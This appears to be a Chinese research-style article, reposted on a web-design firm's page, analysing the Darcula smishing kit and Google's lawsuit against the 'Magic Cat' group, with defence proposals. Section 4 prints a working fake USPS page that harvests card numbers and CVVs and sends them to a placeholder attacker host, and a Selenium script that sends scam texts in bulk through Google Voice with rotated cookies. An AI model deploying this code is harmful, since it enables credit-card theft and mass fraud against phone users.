南京市网站建设_网站建设公司_ASP.NET_seo优化
2025/12/26 9:35:14 网站建设 项目流程

摘要

近年来,利用通信服务平台实施的大规模短信钓鱼(Smishing)攻击呈显著上升趋势。2025年,谷歌公司对以Yucheng Chang为首的“魔猫”(Magic Cat)团伙提起民事诉讼,指控其通过Google Voice与iMessage服务,结合名为Darcula的自动化钓鱼工具套件,向美国用户发送数万条伪装成公共服务机构(如E-ZPass、USPS)的诈骗短信,诱导受害者访问钓鱼网站并窃取身份与金融信息。本文基于公开诉状与安全社区披露的技术细节,系统剖析Darcula套件的架构设计、攻击链路及社会工程策略,并结合真实样本还原其技术实现逻辑。研究发现,该套件通过模块化组件、动态内容生成与云通信服务滥用,实现了高隐蔽性与高扩展性的攻击能力。针对此类跨境、平台依赖型网络犯罪,本文进一步提出以“平台—法律—技术”三位一体的协同治理框架,包括通信服务滥用检测机制、钓鱼基础设施快速封禁流程及跨国司法协作路径。文中辅以典型钓鱼页面代码与自动化脚本示例,为防御方提供可落地的技术参考。本研究对理解现代Smishing攻击演化趋势及构建主动式平台防护体系具有实践意义。

关键词:短信钓鱼;Darcula;Google Voice;iMessage;Smishing;平台治理;跨境网络犯罪

(1) 引言

短信钓鱼(Smishing)作为网络钓鱼(Phishing)的变种,长期依赖运营商短信通道进行传播。然而,随着传统短信网关监管趋严,攻击者开始转向互联网通信服务(Over-the-Top, OTT),尤其是具备高送达率、低延迟与跨平台特性的服务如Google Voice和Apple iMessage。这类服务原本用于个人通信或企业通知,但因其开放注册机制与API集成能力,被恶意行为者大规模滥用。

2025年初,谷歌在美国加利福尼亚北区联邦法院提起民事诉讼(Case No. 5:25-cv-XXXX),指控中国籍被告Yucheng Chang及其关联实体运营“魔猫”(Magic Cat)犯罪团伙,利用Darcula钓鱼套件实施系统性Smishing攻击。诉状指出,该团伙在2023至2024年间,通过批量注册Google Voice号码,结合iMessage的富媒体消息能力,向美国用户发送伪装成政府机构或公用事业公司的诈骗信息,日均发送量达数千条。受害者点击链接后,被导向高度仿真的钓鱼网站,输入信用卡号、社保号等敏感信息,造成重大经济损失。

现有研究多聚焦于传统SMS钓鱼或电子邮件钓鱼,对基于OTT通信平台的新型Smishing攻击缺乏深入技术分析。尤其对于Darcula这类集成化、自动化的钓鱼工具套件,其内部工作机制与防御盲区尚未被充分揭示。本文旨在填补这一空白,通过逆向工程与攻击链重建,解析Darcula的技术架构与操作模式,并在此基础上探讨平台责任边界与法律反制的有效性。

全文结构如下:第(2)节介绍Google Voice与iMessage在Smishing中的滥用机制;第(3)节详细拆解Darcula套件的功能模块与攻击流程;第(4)节展示典型钓鱼页面与自动化脚本代码;第(5)节提出多层次防御与治理策略;第(6)节总结研究发现并指出未来挑战。

(2) OTT通信服务在Smishing中的滥用机制

Google Voice是谷歌提供的免费语音与短信服务,允许用户通过互联网拨打电话或发送短信至真实手机号。其核心优势在于:

可绑定任意美国电话号码;

支持通过Web界面或第三方客户端(如TextNow)批量操作;

短信内容支持超链接,且送达率高于传统垃圾短信。

iMessage则是苹果生态内的即时消息服务,支持富文本、图片及URL预览。当非苹果设备用户收到iMessage时,消息会回落为普通SMS,但若接收方为iPhone用户,则呈现为蓝色气泡,视觉上更具可信度。

攻击者利用上述特性构建“混合投递”策略:

号码获取:通过自动化脚本(如Selenium + 验证码打码平台)批量注册Google Voice账号,每个账号对应一个美国虚拟号码;

消息构造:使用模板引擎动态生成个性化内容,例如:“【USPS】您的包裹#98765因地址错误被扣留,请点击更新信息:[短链接]”;

投递执行:通过Google Voice Web API或模拟浏览器操作,向目标手机号列表发送消息;同时,若目标为iPhone用户,iMessage会自动渲染链接预览,进一步增强欺骗性。

值得注意的是,Google Voice对新注册账号设有每日短信限额(通常为50–100条),但攻击者通过控制数百个僵尸账号轮换发送,有效规避速率限制。此外,由于Google Voice号码本身属于合法分配资源,传统基于黑名单的过滤系统难以识别其恶意用途。

(3) Darcula钓鱼套件架构与攻击流程

Darcula并非单一工具,而是一套高度模块化的钓鱼即服务(Phishing-as-a-Service, PhaaS)平台。根据安全研究人员披露的样本及谷歌诉状描述,其核心组件包括:

(3.1) 指挥与控制(C2)面板

基于PHP/MySQL构建的Web管理后台,攻击者可在此:

导入目标手机号列表;

选择钓鱼模板(如E-ZPass、IRS、银行通知);

配置短链接服务(如Bitly、自建跳转器);

查看受害者提交数据(含IP、设备信息、表单内容)。

(3.2) 动态内容生成引擎

使用Jinja2或Handlebars模板语言,根据目标地域、运营商等元数据动态填充短信内容。例如:

{{ if carrier == "Verizon" }}

【E-ZPass NY】您的账户#{{ account_id }}因未支付$48.90通行费将被暂停。立即处理:{{ short_url }}

{{ else }}

【USPS】包裹#{{ tracking_id }}需确认地址。点击更新:{{ short_url }}

{{ endif }}

该机制显著提升钓鱼成功率,避免千篇一律的内容触发用户警觉。

(3.3) 钓鱼页面生成器

自动生成响应式HTML页面,模仿目标机构官网。关键特征包括:

使用合法SSL证书(通过Let’s Encrypt自动申请);

嵌入Google Analytics与reCAPTCHA以伪装合法性;

表单字段与真实服务一致(如E-ZPass要求输入车牌号、信用卡CVV)。

(3.4) 数据回传与清洗模块

受害者提交信息后,数据经AES加密传输至C2服务器,并按字段分类存储。高价值数据(如信用卡号)可自动推送至Telegram Bot或暗网市场接口。

整个攻击流程如下:

攻击者在Darcula面板上传10,000个美国手机号;

系统分配500个Google Voice账号,每账号发送20条短信;

受害者点击短链接,跳转至伪造的USPS页面;

用户输入姓名、地址、信用卡信息并提交;

数据回传至C2,攻击者实时监控并导出;

数小时内,信用卡被用于在线购物或兑换礼品卡。

(4) 技术实现示例

以下为Darcula生成的典型钓鱼页面核心代码(简化版):

<!-- usps-claim.html -->

<!DOCTYPE html>

<html>

<head>

<meta charset="UTF-8">

<title>USPS – Package Issue</title>

<link rel="icon" href="https://www.usps.com/favicon.ico">

<style>

body { font-family: Arial, sans-serif; background: #f5f5f5; }

.container { max-width: 600px; margin: 40px auto; background: white; padding: 30px; border-radius: 8px; }

input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 4px; }

button { background: #e60000; color: white; padding: 12px; border: none; border-radius: 4px; cursor: pointer; }

</style>

</head>

<body>

<div>

<img src="https://www.usps.com/images/shared/logo_usps.svg" width="180">

<h2>Package Delivery Issue</h2>

<p>Your package (Tracking #987654321) requires address confirmation.</p>

<form id="phishForm">

<input type="text" name="full_name" placeholder="Full Name" required>

<input type="text" name="address" placeholder="Street Address" required>

<input type="text" name="city" placeholder="City" required>

<input type="text" name="state" placeholder="State" required>

<input type="tel" name="phone" placeholder="Phone Number" required>

<input type="email" name="email" placeholder="Email Address" required>

<h3>Billing Information (for verification)</h3>

<input type="text" name="card_number" placeholder="Card Number" required>

<input type="text" name="exp_date" placeholder="MM/YY" required>

<input type="text" name="cvv" placeholder="CVV" required>

<button type="submit">Confirm Address</button>

</form>

</div>

<script>

document.getElementById('phishForm').addEventListener('submit', function(e) {

e.preventDefault();

const data = new FormData(this);

fetch('https://attacker-c2[.]xyz/collect.php', {

method: 'POST',

body: data

}).then(() => {

window.location.href = "https://www.usps.com"; // 跳转至真实官网以消除怀疑

});

});

</script>

</body>

</html>

该页面的关键欺骗点在于:

使用USPS官方Logo与配色;

表单字段与真实包裹查询流程高度一致;

提交后跳转至真实官网,制造“操作成功”假象。

此外,Darcula配套的自动化发送脚本(Python示例)如下:

# send_smish.py

import requests

import time

from selenium import webdriver

from selenium.webdriver.common.by import By

def send_via_google_voice(phone, message, cookies):

driver = webdriver.Chrome()

driver.get("https://voice.google.com")

# 注入登录态cookies

for cookie in cookies:

driver.add_cookie(cookie)

driver.refresh()

compose_btn = driver.find_element(By.XPATH, "//div[@role='button' and text()='Compose']")

compose_btn.click()

to_input = driver.find_element(By.NAME, "to")

to_input.send_keys(phone)

msg_input = driver.find_element(By.XPATH, "//textarea")

msg_input.send_keys(message)

send_btn = driver.find_element(By.XPATH, "//button[@aria-label='Send']")

send_btn.click()

time.sleep(2)

driver.quit()

# 批量调用

targets = load_phone_list("us_numbers.txt")

template = "【USPS】Your package #{} needs address update: {}"

short_url = "https://bit.ly/3xYzAbc"

for i, phone in enumerate(targets):

msg = template.format(f"{98765-i:09d}", short_url)

send_via_google_voice(phone, msg, GV_COOKIES[i % len(GV_COOKIES)])

time.sleep(1.5) # 规避速率限制

此类脚本虽简单,但配合大量账号与代理IP,可实现规模化攻击。

(5) 防御与治理策略

针对Darcula类攻击,需构建多层防御体系。

(5.1) 平台侧检测机制

异常行为建模:对Google Voice账号建立行为基线,如新账号短时间内向非联系人发送大量含URL的短信,应触发风控;

内容语义分析:部署NLP模型识别“紧急”“立即处理”“账户暂停”等高风险关键词组合;

短链接信誉库:与VirusTotal、Cisco Talos等合作,实时拦截指向已知钓鱼域名的链接。

(5.2) 法律反制路径

谷歌此次诉讼采用“民事禁令+资产冻结”策略,具有示范意义:

依据《加州商业与职业法典》第17200条(不公平竞争),主张被告行为构成非法商业实践;

请求法院签发临时限制令(TRO),强制谷歌封禁涉案账号、域名及云服务器;

追溯资金流向,申请冻结通过Stripe、PayPal等渠道洗钱的账户。

此类法律行动虽无法直接抓捕境外嫌疑人,但可有效切断其运营基础设施,提高犯罪成本。

(5.3) 用户教育与透明度提升

在Google Voice界面增加“此号码未验证身份”提示;

对含外部链接的iMessage显示“非官方消息”警告标签;

推广反钓鱼意识:公共服务机构绝不会通过短信索要信用卡信息。

(6) 结语

本文通过对谷歌诉“魔猫”团伙案的技术复盘,揭示了Darcula钓鱼套件如何利用OTT通信服务实施大规模Smishing攻击。研究表明,攻击者通过自动化工具、社会工程模板与平台漏洞的结合,构建了高效、低成本的犯罪流水线。尽管Google Voice与iMessage本身并非恶意,但其开放性与缺乏滥用监控机制,使其成为网络犯罪的理想载体。

所提出的“平台—法律—技术”协同治理框架,强调科技公司在打击跨境网络犯罪中的主动角色。未来,随着AI生成内容(AIGC)在钓鱼模板中的应用,攻击将更具迷惑性。平台需从被动响应转向主动防御,通过行为分析、实时封禁与司法协作,压缩犯罪生态的生存空间。本研究为通信服务提供商、执法机构及安全研究者提供了可操作的技术与策略参考。

编辑:芦笛(公共互联网反网络钓鱼工作组)

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询